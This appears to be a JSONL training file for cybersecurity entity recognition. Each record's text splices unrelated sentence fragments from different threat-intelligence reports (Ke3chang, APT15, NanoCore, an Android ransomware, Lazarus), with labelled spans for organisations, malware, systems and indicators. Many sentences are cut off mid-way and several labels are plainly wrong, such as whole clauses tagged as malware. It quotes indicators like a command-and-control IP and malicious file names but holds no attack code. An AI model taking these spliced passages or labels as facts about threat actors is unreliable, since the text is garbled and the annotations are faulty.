Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": [{"start": 29, "end": 50, "label": "Indicator"}, {"start": 262, "end": 275, "label": "System"}, {"start": 352, "end": 356, "label": "Organization"}, {"start": 523, "end": 557, "label": "Malware"}]} {"text": "It also protects users and organizations from other mobile threats , such as mobile phishing , unsafe network connections , and unauthorized access to sensitive data . The current Ke3chang campaign leverages the BS2005 malware , while older activity from 2010 - 2011 leveraged BMW , followed by the MyWeb malware sporadically used in between . Testing in multiple versions is important , DarkRace is a new ransomware group first discovered by researcher S!Ri .", "spans": [{"start": 212, "end": 226, "label": "System"}, {"start": 277, "end": 280, "label": "System"}, {"start": 299, "end": 312, "label": "System"}, {"start": 388, "end": 396, "label": "Organization"}, {"start": 454, "end": 458, "label": "Organization"}]} {"text": "Learn more about our mobile threat defense capabilities in Microsoft Defender for Endpoint on Android . A trait common to all three malware families we analyzed is that they use the IWebBrowser2 COM interface to perform their CnC communication . so TAU is looking for newer versions ANEL samples . 
Whoever hacked Ashley Madison had access to all employee emails , but they only released Biderman \u2019s messages \u2014 three years worth .", "spans": [{"start": 59, "end": 77, "label": "System"}, {"start": 94, "end": 101, "label": "System"}, {"start": 182, "end": 198, "label": "System"}, {"start": 249, "end": 252, "label": "Organization"}, {"start": 283, "end": 287, "label": "Organization"}, {"start": 313, "end": 327, "label": "Organization"}]} {"text": "Malware , phishing , and other threats detected by Microsoft Defender for Endpoint are reported to the Microsoft Defender Security Center , allowing SecOps to investigate mobile threats along with endpoint signals from Windows and other platforms using Microsoft Defender for Endpoint \u2019 s rich set of tools for detection , investigation , and response . Three months after the Olympics-themed attacks , FireEye observed a new BS2005 campaign labeled \" newtiger \" , which is possibly a reference to an older 2010 campaign labeled \" tiger \" . Please reach out to our unit if you have relevant samples or need assistance in deobfuscating the codes . Indicators of compromise aid information security and IT professionals in detecting data breaches , malware infections , or other threat activity .", "spans": [{"start": 51, "end": 69, "label": "System"}, {"start": 103, "end": 137, "label": "Organization"}, {"start": 219, "end": 226, "label": "System"}, {"start": 253, "end": 271, "label": "System"}, {"start": 403, "end": 410, "label": "Organization"}]} {"text": "Threat data from endpoints are combined with signals from email and data , identities , and apps in Microsoft 365 Defender ( previously Microsoft Threat Protection ) , which orchestrates detection , prevention , investigation , and response across domains , providing coordinated defense . Using information from the FireEye DTI cloud , FireEye observed that Ke3chang targeted a single firm . 
Double Loaded Zip File Delivers Nanocore Most malware sent via emails is packaged in archives such as ZIP, RAR, and 7z ) . How The Command are executed The malware add to the user environment variables and creates a pipe for covert communication and receiving the output .", "spans": [{"start": 100, "end": 122, "label": "System"}, {"start": 136, "end": 163, "label": "System"}, {"start": 317, "end": 328, "label": "Organization"}, {"start": 337, "end": 344, "label": "Organization"}, {"start": 359, "end": 367, "label": "Organization"}, {"start": 456, "end": 462, "label": "System"}, {"start": 545, "end": 556, "label": "Malware"}, {"start": 557, "end": 594, "label": "Malware"}, {"start": 599, "end": 638, "label": "Malware"}, {"start": 643, "end": 663, "label": "Malware"}]} {"text": "Microsoft Defender for Endpoint on Android further enriches organizations \u2019 visibility into malicious activity , empowering them to comprehensively prevent , detect , and respond to against attack sprawl and cross-domain incidents . The Ke3chang attackers used the older \" MyWeb \" malware family from 2010 to 2011 . Occasionally, we encounter some clever and creative ways these malicious archives are . CADDYWIPER will attempt to wipe all files before proceeding to wipe any mapped drives .", "spans": [{"start": 0, "end": 18, "label": "System"}, {"start": 35, "end": 42, "label": "System"}, {"start": 237, "end": 245, "label": "Organization"}, {"start": 246, "end": 255, "label": "Organization"}, {"start": 273, "end": 278, "label": "System"}, {"start": 404, "end": 414, "label": "Malware"}]} {"text": "Technical analysis Obfuscation On top of recreating ransomware behavior in ways we haven \u2019 t seen before , the Android malware variant uses a new obfuscation technique unique to the Android platform . The Ke3chang attackers used the older MyWeb malware family from 2010 to 2011 . Here we will examine an example of an oddly formatted ZIP archive hiding the NanoCore . 
The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": [{"start": 111, "end": 118, "label": "System"}, {"start": 182, "end": 189, "label": "System"}, {"start": 205, "end": 213, "label": "Organization"}, {"start": 214, "end": 223, "label": "Organization"}, {"start": 239, "end": 252, "label": "System"}, {"start": 357, "end": 365, "label": "Malware"}, {"start": 368, "end": 391, "label": "Organization"}, {"start": 428, "end": 438, "label": "Organization"}, {"start": 504, "end": 520, "label": "Malware"}]} {"text": "One of the tell-tale signs of an obfuscated malware is the absence of code that defines the classes declared in the manifest file . During our period of visibility into the BS2005 \" moviestar \" campaign against various ministries of foreign affairs in Europe , FireEye discovered that the Ke3chang had initially tested the malware in virtual machines , prior to compromising actual targets . We spotted a courier themed spam campaign on our Secure Email Gateway (SEG ) cloud . 
After further research , we were able to link Hack520 to different network administration activities , notably with a Virtual Private Server ( VPS ) hosting service .", "spans": [{"start": 219, "end": 248, "label": "Organization"}, {"start": 261, "end": 268, "label": "Organization"}, {"start": 289, "end": 297, "label": "Organization"}, {"start": 441, "end": 461, "label": "System"}, {"start": 462, "end": 466, "label": "System"}, {"start": 523, "end": 530, "label": "Organization"}, {"start": 595, "end": 641, "label": "System"}]} {"text": "The classes.dex has implementation for only two classes : The main application class gCHotRrgEruDv , which is involved when the application opens A helper class that has definition for custom encryption and decryption This means that there \u2019 s no code corresponding to the services declared in the manifest file : Main Activity , Broadcast Receivers , and Background . The MyWeb sample that FireEye analyzed has a compile date of 1/20/2011 . The message claimed to be from an Export Operation Specialist of USCO Logistics and that it was sent as per their customer . Collect NSPPE core dump files from NetScaler .", "spans": [{"start": 373, "end": 385, "label": "System"}, {"start": 391, "end": 398, "label": "Organization"}, {"start": 507, "end": 521, "label": "Organization"}]} {"text": "How does the malware work without code for these key components ? At least one of the attacks in this campaign leveraged a European security and defense-themed lure , which aligns with the targeting preferences for this group . Aside from this, there were several other suspicious items we noted: Headers mismatched: The Reply-To and From email address were . 
But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": [{"start": 220, "end": 225, "label": "Organization"}, {"start": 339, "end": 344, "label": "System"}, {"start": 434, "end": 450, "label": "Vulnerability"}, {"start": 508, "end": 512, "label": "Organization"}]} {"text": "As is characteristic for obfuscated threats , the malware has encrypted binary code stored in the Assets folder : When the malware runs for the first time , the static block of the main class is run . MyWeb is the second-generation malware used by Ke3chang . Furthermore, the email address used in Reply-To is from a free email client . This new ransomware variant does n't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks .", "spans": [{"start": 201, "end": 206, "label": "System"}, {"start": 248, "end": 256, "label": "Organization"}, {"start": 276, "end": 281, "label": "System"}, {"start": 322, "end": 327, "label": "System"}, {"start": 337, "end": 414, "label": "Malware"}]} {"text": "The code is heavily obfuscated and made unreadable through name mangling and use of meaningless variable names : Decryption with a twist The malware uses an interesting decryption routine : the string values passed to the decryption function do not correspond to the decrypted value , they correspond to junk code to simply hinder analysis . ministries of foreign affairs in Europe have been targeted and compromised by a threat actor we call Ke3chang . Suspicious message body: The attachment was mentioned in the message body twice, making sure to direct the reader\u2019s attention towards the . 
The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": [{"start": 342, "end": 371, "label": "Organization"}, {"start": 422, "end": 434, "label": "Organization"}, {"start": 443, "end": 451, "label": "Organization"}, {"start": 625, "end": 632, "label": "Organization"}]} {"text": "On Android , an Intent is a software mechanism that allows users to coordinate the functions of different Activities to achieve a task . This attack used the crisis in Syria as a lure to deliver malware to its targets . Suspicious attachment name: The name of attachment SHIPPING_MX00034900_PL_INV_pdf.zip ends with pdf.zip . The group appears to commonly deploy double extortion of the victims that have been listed on the leak site , several of them have had some portion of their exfiltrated data exposed .", "spans": [{"start": 3, "end": 10, "label": "System"}, {"start": 271, "end": 305, "label": "Indicator"}, {"start": 316, "end": 323, "label": "Indicator"}, {"start": 410, "end": 433, "label": "Organization"}]} {"text": "It \u2019 s a messaging object that can be used to request an action from another app component . Tracking the malicious activities of the elusive Ke3chang APT group , ESET researchers have discovered new versions of malware families linked to the group , and a previously unreported backdoor . That usually means that the name of the file inside the archive ends with 2 known file extensions \u201cpdf.\u201d (archiving tools usually defaults the to the archive\u2019s format e.g. ) . 
The malware is designed to cause electric power disruption by interacting with IEC 60870 - 5 - 104 ( IEC-104 ) devices , such as remote terminal units ( RTUs ) , that are commonly leveraged in electric transmission and distribution operations in Europe , the Middle East , and Asia .", "spans": [{"start": 142, "end": 150, "label": "Organization"}, {"start": 151, "end": 160, "label": "Organization"}, {"start": 163, "end": 167, "label": "Organization"}, {"start": 243, "end": 248, "label": "Organization"}, {"start": 568, "end": 607, "label": "System"}, {"start": 618, "end": 648, "label": "System"}]} {"text": "The Intent object carries a string value as \u201c action \u201d parameter . Furthermore , FireEye has presented evidence indicating that the Ke3chang attackers have been active since at least 2010 and have attacked targets related to G20 meetings in the past . The attachment SHIPPING_MX00034900_PL_INV_pdf.zip makes this message stand . An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": [{"start": 81, "end": 88, "label": "Organization"}, {"start": 132, "end": 140, "label": "Organization"}, {"start": 141, "end": 150, "label": "Organization"}, {"start": 225, "end": 237, "label": "Organization"}, {"start": 267, "end": 301, "label": "Indicator"}, {"start": 382, "end": 601, "label": "Malware"}]} {"text": "The malware creates an Intent inside the decryption function using the string value passed as the name for the Intent . 
During our brief window of visibility into one of the known 22 CnC nodes , FireEye observed the Ke3chang conducting reconnaissance and moving laterally throughout the compromised networks . The ZIP file had a file size significantly greater than that of its uncompressed . These threats can come from internal employees , vendors , a contractor or a partnerand are viewed as some of the greatest cyber security threats to organizations .", "spans": [{"start": 195, "end": 202, "label": "Organization"}, {"start": 216, "end": 224, "label": "Organization"}, {"start": 421, "end": 439, "label": "Organization"}, {"start": 442, "end": 449, "label": "Organization"}, {"start": 454, "end": 464, "label": "Organization"}, {"start": 470, "end": 480, "label": "Organization"}, {"start": 542, "end": 555, "label": "Organization"}]} {"text": "It then decrypts a hardcoded encrypted value and sets the \u201c action \u201d parameter of the Intent using the setAction API . Ke3chang attackers are operating within China . Typically, the size of the ZIP file should be less than the uncompressed content or, in some cases, ZIP files will grow larger than the original files by a reasonable number of . The second step is simply the same exploit used in the second step of ProxyNotShell , allowing code execution through PowerShell remoting .", "spans": [{"start": 119, "end": 127, "label": "Organization"}, {"start": 128, "end": 137, "label": "Organization"}, {"start": 432, "end": 483, "label": "Vulnerability"}]} {"text": "Once this Intent object is generated with the action value pointing to the decrypted content , the decryption function returns the Intent object to the callee . In May 2017 , NCC Group 's Incident Response team reacted to an ongoing incident . ZIP archives are supposed to have one \u201cEnd of Central Directory\u201d (EOCD) signifying the end of the . 
In 2015 GReAT reported that CozyDuke often spear phishes targets with emails containing a link to a hacked website .", "spans": [{"start": 175, "end": 205, "label": "Organization"}, {"start": 352, "end": 357, "label": "Organization"}, {"start": 372, "end": 380, "label": "Malware"}]} {"text": "The callee then invokes the getAction method to get the decrypted content . which provides a range of services to UK Government . Looking deeper into the structure of SHIPPING_MX00034900_PL_INV_pdf.zip , the attachment has two . Indicators of attack are not so much a static description of the attacker , but a dynamic profile of how an attacker interacts with your technologies and users .", "spans": [{"start": 114, "end": 127, "label": "Organization"}, {"start": 167, "end": 201, "label": "Indicator"}, {"start": 229, "end": 249, "label": "Indicator"}, {"start": 309, "end": 388, "label": "Indicator"}]} {"text": "Payload deployment Once the static block execution is complete , the Android Lifecycle callback transfers the control to the OnCreate method of the main class . APT15 was targeting information related to UK government departments and military technology . After the first EOCD comes some extra data \u2013 another ZIP file . Initially engaged in espionage activity , Agrius deployed a set of destructive wiper attacks against Israeli targets , masquerading the activity as ransomware attacks .", "spans": [{"start": 69, "end": 86, "label": "System"}, {"start": 161, "end": 166, "label": "Organization"}, {"start": 207, "end": 217, "label": "Organization"}, {"start": 234, "end": 253, "label": "Organization"}, {"start": 362, "end": 368, "label": "Organization"}, {"start": 378, "end": 412, "label": "Organization"}, {"start": 421, "end": 436, "label": "Organization"}]} {"text": "Malware code showing onCreate method Figure 9. 
onCreate method of the main class decrypting the payload Next , the malware-defined function decryptAssetToDex ( a meaningful name we assigned during analysis ) receives the string \u201c CuffGmrQRT \u201d as the first argument , which is the name of the encrypted file stored in the Assets folder . backdoors that now appear to be part of APT15 's toolset . It turns out that the first ZIP structure is for the image file order.jpg while the second one is for an executable file SHIPPING_MX00034900_PL_INV_pdf.exe . Astamirov is now facing charges of wire fraud and of intentionally damaging protected computers , plus he 's accused of making ransom demands through deploying ransomware .", "spans": [{"start": 230, "end": 240, "label": "Indicator"}, {"start": 377, "end": 382, "label": "Organization"}, {"start": 460, "end": 469, "label": "Indicator"}, {"start": 517, "end": 551, "label": "Indicator"}, {"start": 554, "end": 563, "label": "Organization"}]} {"text": "Malware code showing decryption of assets Figure 10 . This report demonstrates that Ke3chang is able to successfully penetrate government targets using exploits for vulnerabilities that have already been patched and despite the fact that these ministries have defenses in place . Both are compressed when archived, and both indicate that they are the only file in their ZIP structures as indicated in their local file headers and EOCDs . We have observed individuals with managerial , digital marketing , digital media , and human resources roles in companies to have been targeted .", "spans": [{"start": 84, "end": 92, "label": "Organization"}, {"start": 127, "end": 137, "label": "Organization"}, {"start": 455, "end": 546, "label": "Organization"}]} {"text": "Decrypting the assets After being decrypted , the asset turns into the .dex file . RoyalDNS - required APT15 . The image file \u201corder.jpg\u201d contained in the first ZIP structure is actually a non-malicious PNG formatted image . 
Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": [{"start": 83, "end": 91, "label": "System"}, {"start": 103, "end": 108, "label": "Organization"}, {"start": 265, "end": 312, "label": "Vulnerability"}]} {"text": "This is a notable behavior that is characteristic of this ransomware family . The Ke3chang group also used keyloggers and their own .NET tool to enumerate folders and dump data from Microsoft Exchange mailboxes . This serves as a decoy, an attempt to hide the content of the other ZIP . Does your organization possess any PII or regulated data such as payment card data , health care data , social security numbers or bank accounts Financially motivated attacks", "spans": [{"start": 82, "end": 96, "label": "Organization"}, {"start": 107, "end": 117, "label": "System"}, {"start": 132, "end": 141, "label": "System"}, {"start": 322, "end": 325, "label": "Organization"}]} {"text": "Comparison of code of Asset file before and after decryption Figure 11 . APT15 was also observed using Mimikatz to dump credentials and generate Kerberos golden tickets . The image file has been correctly identified by SEG as a PNG when its file extension is .jpg denoting a JPEG formatted . None on the CrowdStrike Falcon \u00ae console and of the market - leading CrowdStrike Falcon \u00ae platform in action .", "spans": [{"start": 73, "end": 78, "label": "Organization"}, {"start": 103, "end": 111, "label": "System"}, {"start": 259, "end": 263, "label": "Indicator"}, {"start": 304, "end": 322, "label": "System"}, {"start": 361, "end": 379, "label": "System"}]} {"text": "Asset file before and after decryption Once the encrypted executable is decrypted and dropped in the storage , the malware has the definitions for all the components it declared in the manifest file . This time , APT15 opted for a DNS based backdoor : RoyalDNS . The second ZIP structure contains SHIPPING_MX00034900_PL_INV_pdf.exe , which is a NanoCore . 
The CozyDuke malware utilizes a backdoor and dropper , and exfiltrates data to a C2 server .", "spans": [{"start": 213, "end": 218, "label": "Organization"}, {"start": 231, "end": 249, "label": "System"}, {"start": 252, "end": 260, "label": "System"}, {"start": 297, "end": 331, "label": "Indicator"}, {"start": 345, "end": 353, "label": "Malware"}, {"start": 360, "end": 368, "label": "Malware"}, {"start": 437, "end": 446, "label": "System"}]} {"text": "It then starts the final detonator function to load the dropped .dex file into memory and triggers the main payload . APT15 then used a tool known as RemoteExec . This remote access Trojan has the capability that allows an attacker to completely take control of the compromised . None Organizations should apply the November 8 , 2022 patches for Exchange to prevent exploitation since the URL rewrite mitigations for ProxyNotShell are not effective against this exploit method .", "spans": [{"start": 118, "end": 123, "label": "Organization"}, {"start": 150, "end": 160, "label": "System"}, {"start": 182, "end": 188, "label": "Malware"}, {"start": 417, "end": 430, "label": "Vulnerability"}]} {"text": "Malware code showing loading of decrypted dex file Figure 12 . APT15 then used a tool known as RemoteExec ( similar to Microsoft . It connects to its command and control server at 194.5.98.85 on port . 
Take the case of a research and development firm .", "spans": [{"start": 63, "end": 68, "label": "Organization"}, {"start": 95, "end": 105, "label": "System"}, {"start": 119, "end": 128, "label": "Organization"}, {"start": 180, "end": 191, "label": "Indicator"}, {"start": 221, "end": 250, "label": "Organization"}]} {"text": "Loading the decrypted .dex file into memory and triggering the main payload Main payload When the main payload is loaded into memory , the initial detonator hands over the control to the main payload by invoking the method XoqF ( which we renamed to triggerInfection during analysis ) from the gvmthHtyN class ( renamed to PayloadEntry ) . Coincidentally , following the recent hack of a US Navy contractor and theft of highly sensitive data on submarine warfare , we have found evidence of very recent activity by a group referred to as APT15 , known for committing cyber espionage which is believed to be affiliated with the Chinese government . This NanoCore RAT is version 1.2.2.0 which has been found to be offered for free on the Dark Web just a few months . The threat actor targets individuals and employees that may have access to a Facebook Business account with an information - stealer malware .", "spans": [{"start": 391, "end": 395, "label": "Organization"}, {"start": 517, "end": 522, "label": "Organization"}, {"start": 538, "end": 543, "label": "Organization"}, {"start": 567, "end": 582, "label": "Organization"}, {"start": 653, "end": 661, "label": "Malware"}, {"start": 736, "end": 744, "label": "Organization"}, {"start": 769, "end": 781, "label": "Organization"}, {"start": 790, "end": 867, "label": "Organization"}]} {"text": "Malware code showing handover from initial module to main payload Figure 13 . APT15 is known for committing cyberespionage against companies and organizations located in many different countries , targeting different sectors such as the oil industry , government contractors , military , and more . 
We used different archiving tools such as PowerArchiver 2019 , WinZip , WinRar , 7Zip , and unzIP S-TOOL that is built into the Windows OS in attempting to extract the content of the attachment SHIPPING_MX00034900_PL_INV_pdf.zip . While this shift likely reflects the increased tempo of wartime cyber operations , it also reveals the GRU \u2019s priority objectives in OT attacks .", "spans": [{"start": 78, "end": 83, "label": "Organization"}, {"start": 108, "end": 122, "label": "Organization"}, {"start": 237, "end": 249, "label": "Organization"}, {"start": 252, "end": 274, "label": "Organization"}, {"start": 277, "end": 285, "label": "Organization"}, {"start": 341, "end": 359, "label": "System"}, {"start": 362, "end": 368, "label": "System"}, {"start": 371, "end": 377, "label": "System"}, {"start": 380, "end": 384, "label": "System"}, {"start": 391, "end": 403, "label": "System"}, {"start": 427, "end": 434, "label": "System"}, {"start": 493, "end": 527, "label": "Indicator"}, {"start": 663, "end": 675, "label": "Organization"}]} {"text": "Handover from initial module to the main payload As mentioned , the initial handover component called triggerInfection with an instance of appObj and a method that returns the value for the variable config . Other names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon . Among these 5 tools, only WinZip and Windows\u2019 unzIP S-TOOL were not able to extract anything from the ZIP file as they encountered an error at the start of the extraction . The hacking and defacement of a U.S. 
Government system in which the attackers post messages disparaging remarks about capitalism or democracy would be a solid example of hacktivism .", "spans": [{"start": 228, "end": 233, "label": "Organization"}, {"start": 238, "end": 249, "label": "Organization"}, {"start": 252, "end": 260, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 279, "end": 293, "label": "Organization"}, {"start": 322, "end": 328, "label": "System"}, {"start": 342, "end": 354, "label": "System"}, {"start": 501, "end": 523, "label": "Organization"}, {"start": 537, "end": 546, "label": "Organization"}]} {"text": "Malware code showing definition of populateConfigMap Figure 14 . ther names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon . The other archiving tools were able to extract one file from the ZIP attachment \u2013 either order.jpg or SHIPPING_MX00034900_PL_INV_pdf.exe . CADDYWIPER was then executed as a scheduled task at a predetermined time .", "spans": [{"start": 84, "end": 89, "label": "Organization"}, {"start": 94, "end": 105, "label": "Organization"}, {"start": 108, "end": 116, "label": "Organization"}, {"start": 119, "end": 128, "label": "Organization"}, {"start": 135, "end": 149, "label": "Organization"}, {"start": 241, "end": 288, "label": "Indicator"}, {"start": 291, "end": 301, "label": "Malware"}]} {"text": "Definition of populateConfigMap , which loads the map with values Correlating the last two steps , one can observe that the malware payload receives the configuration for the following properties : number \u2013 The default number to be send to the server ( in case the number is not available from the device ) api \u2013 The API key url \u2013 The URL to be used in WebView to display on the ransom note The malware saves this configuration to the shared preferences of the app data and then it sets up all the Broadcast Receivers . 
There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group . WinZip version 11.2 and 24.0, and the built-in unzIP S-TOOL tool in Windows , recognized that the attachment SHIPPING_MX00034900_PL_INV_pdf.zip is an invalid . The threat actor first detected towards the end of last year when it attacked at least 87 organizations around the world in two months ' time .", "spans": [{"start": 572, "end": 577, "label": "Organization"}, {"start": 624, "end": 633, "label": "Organization"}, {"start": 636, "end": 642, "label": "System"}, {"start": 683, "end": 695, "label": "System"}, {"start": 704, "end": 711, "label": "System"}, {"start": 745, "end": 779, "label": "Indicator"}]} {"text": "This action registers code components to get notified when certain system events happen . There are many articles and researches online about APT15 and their activities , the most recent one by NCC Group ; although posted in March 2018 , it refers to a campaign in 2017 , both attributed to Chinese government affiliated groups . Only WinZip gave an explicit reason \u2013 the start of central directory of the ZIP was not . For this reason , it is impossible to prevent all crime through deterrence .", "spans": [{"start": 142, "end": 147, "label": "Organization"}, {"start": 194, "end": 203, "label": "Organization"}, {"start": 335, "end": 341, "label": "System"}]} {"text": "This is done in the function initComponents . DLL hijacking techniques have been seen in the past with the APT15 group . The central directory it pertained to is the one in the second ZIP . 
But then , following an upsurge in attacks in the second half of 2014 , GReAT characterized MiniDuke , CosmicDuke and the actor \u2019s Nemesis Gemina project - targeting government , diplomatic , energy , military and telecom operators - as \u2018 one of the world \u2019s most unusual APT operations \u2019 due to : \u2022 Its use of a customized backdoor written in Assembler using \u2018 old school \u2019 virus writing techniques and habits \u2022 Stealthy transfer of updates as executables hidden inside GIF files ( a form of steganography )", "spans": [{"start": 107, "end": 118, "label": "Organization"}, {"start": 262, "end": 267, "label": "Organization"}, {"start": 282, "end": 290, "label": "Malware"}, {"start": 293, "end": 303, "label": "Malware"}, {"start": 321, "end": 343, "label": "Organization"}, {"start": 346, "end": 366, "label": "Organization"}, {"start": 369, "end": 421, "label": "Organization"}]} {"text": "Malware code showing initializing broadcast receiver Figure 15 . cyber actors of the North Korean to target the media , aerospace , financial , and critical infrastructure sectors in the United States and globally . At figure 2, the second EOCD indicates that its only central directory is located at file offset 0xd148f whereas it is at 0xd40d41. 
(The size of the first But while it was clear earlier on that attackers were actively exploiting CVE-2023 - 34362 , it was only a few days later that it became clear that Cl0p was behind the attacks .", "spans": [{"start": 65, "end": 77, "label": "Organization"}, {"start": 112, "end": 117, "label": "Organization"}, {"start": 120, "end": 129, "label": "Organization"}, {"start": 132, "end": 141, "label": "Organization"}, {"start": 148, "end": 179, "label": "Organization"}, {"start": 445, "end": 461, "label": "Vulnerability"}, {"start": 519, "end": 523, "label": "Organization"}]} {"text": "Initializing the BroadcastReceiver against system events From this point on , the malware execution is driven by callback functions that are triggered on system events like connectivity change , unlocking the phone , elapsed time interval , and others . The U.S. Government refers to the malicious cyber activity by the North Korean government as HIDDEN COBRA . ZIP structure was not considered.) Meanwhile, the archiving tools PowerArchiver 2019 , WinRar , and 7Zip were able to extract a file from the attachment SHIPPING_MX00034900_PL_INV_pdf.zip . That is very concerning to us , however , there are a couple of things that end users can look out for : Although zero - click exploits do exist , they 're not very common .", "spans": [{"start": 258, "end": 273, "label": "Organization"}, {"start": 347, "end": 359, "label": "Organization"}, {"start": 428, "end": 446, "label": "System"}, {"start": 449, "end": 455, "label": "System"}, {"start": 462, "end": 466, "label": "System"}, {"start": 515, "end": 549, "label": "Indicator"}, {"start": 666, "end": 687, "label": "Vulnerability"}]} {"text": "Lookout researchers have identified a new , highly targeted surveillanceware family known as Desert Scorpion in the Google Play Store . Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware . 
The latest versions of PowerArchiver 2019 and WinRar displayed in their respective UI the executable SHIPPING_MX00034900_PL_INV_pdf.exe as the only content of the ZIP . However , lessons learned this year can help organizations take proactive steps to protect themselves from ransomware in 2023 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 93, "end": 108, "label": "Malware"}, {"start": 116, "end": 133, "label": "System"}, {"start": 167, "end": 186, "label": "Organization"}, {"start": 195, "end": 207, "label": "System"}, {"start": 210, "end": 220, "label": "System"}, {"start": 223, "end": 242, "label": "System"}, {"start": 245, "end": 249, "label": "System"}, {"start": 258, "end": 271, "label": "System"}, {"start": 297, "end": 315, "label": "System"}, {"start": 320, "end": 326, "label": "System"}, {"start": 375, "end": 409, "label": "Indicator"}]} {"text": "Lookout notified Google of the finding and Google removed the app immediately while also taking action on it in Google Play Protect . Variants of malware and tools used by HIDDEN COBRA actors include Destover and Hangman . No error or warning was prompted during the . Ideology is a motivation that makes the threat a little trickier .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 17, "end": 23, "label": "Organization"}, {"start": 43, "end": 49, "label": "Organization"}, {"start": 112, "end": 131, "label": "System"}, {"start": 172, "end": 191, "label": "Organization"}, {"start": 200, "end": 208, "label": "System"}, {"start": 213, "end": 220, "label": "System"}]} {"text": "The app ties together two malware families - Desert Scorpion and another targeted surveillanceware family named FrozenCell - that we believe are being developed by a single , evolving surveillanceware actor called APT-C-23 targeting individuals in the Middle East . DHS has previously released Alert TA14-353A . Older versions of 7Zip also behave like PowerArchiver and WinRAR . 
7Zip version 9.22 and older saw the executable as . Simultaneously , a threat researcher outside of CrowdStrike discovered an attacker \u2019s tooling via an open repository , downloaded all of the tools , and made them available through a MegaUpload link in a Twitter post.2", "spans": [{"start": 45, "end": 60, "label": "Malware"}, {"start": 112, "end": 122, "label": "Malware"}, {"start": 214, "end": 222, "label": "Malware"}, {"start": 266, "end": 269, "label": "Organization"}, {"start": 330, "end": 334, "label": "System"}, {"start": 352, "end": 365, "label": "System"}, {"start": 370, "end": 376, "label": "System"}, {"start": 379, "end": 383, "label": "System"}, {"start": 450, "end": 467, "label": "Organization"}, {"start": 479, "end": 490, "label": "Organization"}, {"start": 614, "end": 624, "label": "System"}, {"start": 635, "end": 642, "label": "System"}]} {"text": "We 've seen this actor rely heavily on phishing campaigns to trick victims into downloading their malicious apps , specifically on Facebook . The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report . However, starting from 7Zip version 9.34 (next available installer after version 9.22) up to its latest version 19.0, 7zip saw and was able to extract the image file order.jpg . 
Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": [{"start": 131, "end": 139, "label": "System"}, {"start": 195, "end": 202, "label": "Organization"}, {"start": 279, "end": 283, "label": "System"}, {"start": 374, "end": 378, "label": "System"}, {"start": 422, "end": 431, "label": "Indicator"}, {"start": 446, "end": 458, "label": "Malware"}]} {"text": "Even sophisticated actors are using lower cost , less technologically impressive means like phishing to spread their malware because it 's cheap and very effective , especially on mobile devices where there are more ways to interact with a victim ( messaging apps , social media apps , etc . Our analysis shows that the cybercriminals behind the attack against an online casino in Central America , and several other targets in late-2017 , were most likely the infamous Lazarus hacking group . The second ZIP structure was treated as extra data; hence, a warning was added to the extracted image file\u2019s . /Library / LaunchDaemons / com.studentd.agent.plist", "spans": [{"start": 320, "end": 334, "label": "Organization"}, {"start": 470, "end": 491, "label": "Organization"}, {"start": 605, "end": 656, "label": "Indicator"}]} {"text": ") , and less screen real estate for victims to identify potential indicators of a threat . The Lazarus Group was first identified in Novetta 's report Operation Blockbuster in February 2016 . Among the archiving tools we tried, WinRar 3.30 behaved differently and . 
It has two components Loader and core module .", "spans": [{"start": 95, "end": 108, "label": "Organization"}, {"start": 133, "end": 140, "label": "Organization"}, {"start": 228, "end": 234, "label": "System"}, {"start": 269, "end": 310, "label": "Malware"}]} {"text": "Lookout customers are protected against this threat and additionally we have included a list of IOCs at the end of this report . cyberattacks against high-value targets in Ukraine in December 2015 and December 2016 . The content of the ZIP attachment it displayed in its UI was not the one it extracted! This sample challenges gateways . Surprisingly enough , it does not take very long to get some information about Hack520 : someone with this handle runs a blog and a Twitter account ( with a handle close to Hack520 ) that is also directly linked to the blog .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 417, "end": 424, "label": "Organization"}, {"start": 470, "end": 477, "label": "System"}, {"start": 511, "end": 518, "label": "Organization"}]} {"text": "The potential actor and who they target Our current analysis strongly suggests Desert Scorpion is being deployed in targeted attacks against Middle Eastern individuals of interest specifically those in Palestine and has also been highlighted by other researchers . In all of these incidents , the Lazarus utilized similar toolsets , including KillDisk that was executed on compromised machines . Depending on the type of decompression engine used, there is a good probability that only the decoy file may be scrutinized and vetted, and the malicious content unnoticed \u2013 just like how some of the most popular archiving tools failed to notice the second ZIP . 
